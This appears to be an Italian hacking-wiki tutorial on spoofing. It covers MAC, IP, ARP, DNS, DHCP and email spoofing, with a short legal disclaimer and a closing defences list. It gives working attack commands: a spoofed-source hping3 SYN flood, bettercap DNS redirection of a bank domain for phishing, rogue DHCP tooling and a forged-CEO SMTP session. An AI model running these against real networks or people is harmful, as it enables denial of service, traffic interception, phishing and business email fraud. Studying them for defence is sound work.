Home › Rete & Wireless › Spoofing

Spoofing (falsificazione d'identità)

Spoofing = fingersi qualcun altro/qualcos'altro sulla rete. Qui i tipi principali: MAC, IP, ARP, DNS, DHCP, email e altri — come funzionano e come si fanno.

Solo su rete/lab tuoi o con autorizzazione scritta. Falsificare traffico o identità su reti altrui è reato.

Concetto: perché lo spoofing funziona

Molti protocolli di rete sono nati senza autenticazione: chi riceve un pacchetto si fida del mittente dichiarato. Lo spoofing sfrutta esattamente questa fiducia, falsificando un identificatore a un certo livello:

LivelloIdentificatore falsificatoAttacco
2 · Data LinkIndirizzo MACMAC spoofing, ARP spoofing
3 · ReteIndirizzo IP sorgenteIP spoofing
ServiziRisposte DNS / lease DHCPDNS/DHCP spoofing
ApplicazioneMittente email, Caller ID, GPS…Email spoofing, ecc.

MAC spoofing

Come funziona: il MAC è l'ID "fisico" della scheda di rete, ma è modificabile via software. Cambiarlo serve a: aggirare filtri MAC (WiFi/switch), impersonare un dispositivo autorizzato, o restare anonimi.

# 1) spegni l'interfaccia
sudo ip link set eth0 down
# 2a) MAC casuale con macchanger
sudo macchanger -r eth0
# 2b) MAC specifico (es. clonare un device autorizzato)
sudo macchanger -m 00:11:22:33:44:55 eth0
# 3) riaccendi
sudo ip link set eth0 up
# verifica
macchanger -s eth0
Sul WiFi: prima metti la scheda in monitor mode (vedi WiFi Cracking), oppure cambia il MAC dell'interfaccia gestita per bypassare un filtro MAC dell'access point.

IP spoofing

Come funziona: falsifichi l'IP sorgente nei pacchetti che mandi. Il bersaglio pensa che arrivino da un altro host. Usi tipici: attacchi DoS (nascondere l'origine, riflessione/amplificazione), aggirare filtri basati su IP "fidati", e SYN flooding.

Limite chiave: le risposte tornano all'IP falsificato, non a te. Quindi l'IP spoofing "puro" funziona per attacchi "a senso unico" (flood) o quando sei già in mezzo (vedi MITM) per vedere le risposte. Non basta da solo per una connessione TCP completa (serve indovinare/vedere i sequence number).

# hping3: inviare pacchetti con IP sorgente falso (-a = spoof address)
# SYN flood verso la porta 80 spacciandosi per 1.2.3.4
sudo hping3 -S -a 1.2.3.4 -p 80 --flood BERSAGLIO

# scapy: costruire un pacchetto con IP sorgente arbitrario
sudo scapy
send(IP(src="1.2.3.4", dst="10.0.0.5")/ICMP())
Molti provider filtrano i pacchetti con sorgente falsa (BCP38 / egress filtering): l'IP spoofing su Internet spesso non passa. In LAN/lab funziona per studiarlo.

ARP spoofing

È la forma di spoofing più usata per il MITM in LAN: dici alla vittima "il router sono io". Meccanismo e comandi completi (bettercap/ettercap) sono nella pagina dedicata:

WIKI→ MITM & SniffingCome funziona l'ARP, IP forwarding, bettercap/ettercap passo-passo, analisi Wireshark.

DNS spoofing

Come funziona: rispondi al posto del server DNS con un IP falso, così banca.com punta al tuo server (phishing). Richiede di intercettare le query (di solito prima fai ARP spoofing).

# con bettercap, dopo aver attivato arp.spoof:
set dns.spoof.domains banca.com,*.banca.com
set dns.spoof.address 192.168.1.66   # il TUO server
dns.spoof on

Varianti avanzate: DNS cache poisoning (avvelenare la cache di un resolver, es. tecnica Kaminsky) e NXDOMAIN/hijack a livello di resolver.

DHCP spoofing / rogue DHCP

Come funziona: metti un server DHCP finto in LAN che risponde più in fretta di quello vero. Assegni alle vittime un gateway (te stesso) e un DNS (tuo) → diventi il loro man-in-the-middle "legittimo", senza nemmeno fare ARP spoofing.

# Ettercap ha il plugin dhcp; oppure si usa un dnsmasq configurato ad hoc.
# attacco correlato: DHCP starvation (esaurire il pool di IP)
yersinia -G            # GUI per attacchi DHCP/STP/CDP

Email spoofing

Come funziona: SMTP permette di dichiarare un mittente qualsiasi nell'header From:. Se il dominio bersaglio non ha SPF/DKIM/DMARC configurati, l'email falsa arriva "da" chi vuoi (base del phishing/BEC).

# test manuale via telnet su un server SMTP aperto (lab)
telnet mail.lab.local 25
HELO test.com
MAIL FROM:<ceo@azienda.com>
RCPT TO:<vittima@azienda.com>
DATA
From: CEO <ceo@azienda.com>
Subject: Urgente
...
.
# verificare se un dominio è spoofabile: controlla i record
dig TXT azienda.com | grep -i spf
dig TXT _dmarc.azienda.com

Tool: swaks (Swiss Army Knife SMTP) per inviare mail di test; framework di phishing come GoPhish (vedi Arsenale · Social).

Altri tipi di spoofing

TipoCosa falsifica / come
Session hijacking / cookie spoofingRubi/indovini un token di sessione e ti spacci per la vittima (vedi XSS).
Referer / User-Agent spoofingFalsifichi header HTTP per bypassare controlli lato server.
Caller ID spoofingNumero chiamante falso nel vishing (VoIP/SIP).
SMS sender spoofingMittente alfanumerico falso negli SMS (smishing).
GPS spoofingTrasmetti segnali GPS falsi (SDR) per ingannare la geolocalizzazione.
Website / clone spoofingCopia pixel-perfect di un sito per phishing (es. con httrack o SET).
Biometric / face spoofingFoto/maschere per ingannare riconoscimento facciale o impronte.

Difesa

  • MAC/ARP: Dynamic ARP Inspection, DHCP snooping, port security sugli switch.
  • IP: egress/ingress filtering (BCP38), reverse path filtering.
  • DHCP: DHCP snooping (solo server autorizzati rispondono).
  • DNS: DNSSEC, resolver fidati, DoH/DoT.
  • Email: configurare SPF + DKIM + DMARC (blocca il 99% dello spoofing di dominio).
Sui tuoi libri: Network Attacks and Exploitation, Hacking Exposed – Network (cap. spoofing/sniffing), The TCP-IP Guide. Vedi Risorse.